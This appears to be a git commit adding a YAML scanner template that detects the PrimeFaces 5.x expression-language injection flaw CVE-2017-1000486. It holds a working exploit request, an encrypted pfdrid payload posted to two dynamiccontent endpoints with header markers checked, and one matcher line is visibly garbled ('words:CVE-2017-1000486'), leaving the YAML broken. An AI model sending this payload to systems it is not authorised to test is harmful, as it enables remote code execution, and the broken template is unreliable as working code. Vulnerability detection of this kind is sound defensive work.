Add Detection for PrimeFaces 5.x EL Injection (CVE-2017-1000486)

2021-05-27 10:17:31 +02:00 · 2021-05-27 10:17:31 +02:00 · 24bcb23857
parent 04023d98b5
commit 24bcb23857
1 changed files with 38 additions and 0 deletions
--- a/cves/2017/CVE-2017-1000486.yaml
+++ b/cves/2017/CVE-2017-1000486.yaml
@ -0,0 +1,38 @@
+id: CVE-2017-1000486
+
+info:
+  name: CVE-2017-1000486 
+  author: Moritz Nentwig
+  severity: low
+  description: Detection for PrimeFaces 5.x EL Injection (CVE-2017-1000486), a RCE vulnerability that can be used to gain Remote Code Execution on a target.
+
+requests:
+  - method: POST
+    path:
+      - "{{BaseURL}}/javax.faces.resource/dynamiccontent.properties.xhtml"
+    body: "pfdrt=sc&ln=primefaces&pfdrid=uMKljPgnOTVxmOB%2BH6%2FQEPW9ghJMGL3PRdkfmbiiPkUDzOAoSQnmBt4dYyjvjGhVbBkVHj5xLXXCaFGpOHe704aOkNwaB12Cc3Iq6NmBo%2BQZuqhqtPxdTA%3D%3D"
+    headers:
+      Content-Type: application/x-www-form-urlencoded
+    
+    matchers:
+      - type: word
+        words:CVE-2017-1000486
+          - 'MOGWAILABS'
+          - 'CHECKCHECK'
+        part: header
+    redirect: true
+  
+  - method: POST 
+    path:
+      - "{{BaseURL}}/javax.faces.resource/dynamiccontent.properties.jsf"
+    body: "pfdrt=sc&ln=primefaces&pfdrid=uMKljPgnOTVxmOB%2BH6%2FQEPW9ghJMGL3PRdkfmbiiPkUDzOAoSQnmBt4dYyjvjGhVbBkVHj5xLXXCaFGpOHe704aOkNwaB12Cc3Iq6NmBo%2BQZuqhqtPxdTA%3D%3D"
+    headers:
+      Content-Type: application/x-www-form-urlencoded
+    
+    matchers:
+      - type: word
+        words:
+          - 'MOGWAILABS'
+          - 'CHECKCHECK'
+        part: header
+    redirect: true